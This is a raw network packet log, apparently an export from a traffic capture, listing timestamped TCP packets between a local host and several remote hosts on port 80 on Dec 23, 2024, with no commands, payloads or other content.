                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.013360977 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.016407967 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.016484976 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.016505003 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.024827003 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.024914980 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.024934053 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.033149004 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.033220053 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.033260107 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.041574955 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.041650057 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.041688919 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.049946070 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.050024033 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.050062895 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.058347940 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.058418036 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.058474064 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.066732883 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.066811085 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.066910982 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.075100899 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.075165987 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.075216055 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.120012045 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.192909002 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.193006039 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.193152905 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.196034908 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.196074009 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.196156025 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.212723017 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.212801933 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.213051081 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.215532064 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.215626955 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.215706110 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.221342087 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.221378088 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.221463919 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.227118969 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.227221012 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.227344990 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.232863903 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.232954025 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.233028889 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.238672972 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.238764048 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.238827944 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.244460106 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.244571924 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.244801998 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.250314951 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.250469923 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.250600100 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.256083012 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.256189108 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.256273031 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.261868000 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.262038946 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.262120008 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.267654896 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.267776012 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.267855883 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.273436069 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.273514986 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.273596048 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.279566050 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.279603004 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.279679060 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.285024881 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.285190105 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.285275936 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.290858984 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.290957928 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.291040897 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.296612978 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.296705961 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.296886921 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.302438974 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.302532911 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.302654982 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.308232069 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.308362961 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.308450937 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.313937902 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.314062119 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.316562891 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.435990095 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.631520987 CET4988980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.751055002 CET8049889199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.751127005 CET4988980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.764659882 CET4988980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.884241104 CET8049889199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:17.847529888 CET8049889199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:17.847604036 CET8049889199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:17.847692966 CET8049889199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:17.847714901 CET4988980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:17.847752094 CET4988980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:18.276452065 CET4988980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:19.294872999 CET4989780192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:19.414406061 CET8049897199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:19.414494991 CET4989780192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:19.427659988 CET4989780192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:19.547410965 CET8049897199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.511162043 CET8049897199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.511205912 CET8049897199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.511241913 CET8049897199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.511272907 CET4989780192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.511324883 CET4989780192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.932679892 CET4989780192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:21.951160908 CET4990380192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.070811033 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.070905924 CET4990380192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.085154057 CET4990380192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.204792023 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.215955973 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.215986967 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216018915 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216047049 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216074944 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216103077 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216130018 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216176987 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180619001 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180682898 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180716991 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180910110 CET4990380192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.588902950 CET4990380192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.607825994 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.727560043 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.727665901 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.735997915 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.855606079 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.824857950 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.824978113 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.825014114 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.825097084 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.825135946 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.827716112 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.947458982 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.410299063 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.530278921 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.530474901 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.542052031 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.662308931 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.057641983 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125607967 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125674963 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125696898 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125742912 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.177464962 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.177520990 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.076163054 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.195707083 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.195830107 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.208802938 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.328438044 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.713860035 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790000916 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790062904 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790158033 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790205956 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.833592892 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.833663940 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.732290983 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.852114916 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.852206945 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.865643978 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985507011 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985552073 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985609055 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985640049 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985690117 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985728979 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985779047 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985831022 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985862970 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:38.370315075 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:38.490468979 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:38.490565062 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.389902115 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.509542942 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.509639025 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.518012047 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.637481928 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161214113 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161362886 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161401987 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161441088 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161465883 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161493063 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161495924 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161534071 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161567926 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161578894 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161606073 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161640882 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161649942 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161679029 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161720037 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.281788111 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.281845093 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.282023907 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.285612106 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.338818073 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.383244991 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.383423090 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.383526087 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.387306929 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.388581991 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.388623953 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.388659000 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.397057056 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.397125006 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.397254944 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.405706882 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.405764103 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.405797005 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.414047003 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.414112091 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.414125919 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.422419071 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.422508001 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.422513008 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.430814981 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.430922985 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.430958033 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.439104080 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.439160109 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.439327955 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.447271109 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.447350979 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.447367907 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.455750942 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.455845118 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.456187010 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.464104891 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.464158058 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.464199066 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.503575087 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.503628969 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.503714085 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.557543993 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.604856968 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.604964972 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.605057001 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.607774019 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.607830048 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.607916117 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.613431931 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.613492012 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.613585949 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.619127035 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.619188070 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.619333982 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.624388933 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.624499083 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.624598026 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.630464077 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.630520105 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.630593061 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.635795116 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.635915995 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.636008978 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.639620066 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.639687061 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.639776945 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.643850088 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.643928051 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.644043922 CET4994880192.168.2.4192.186.58.31
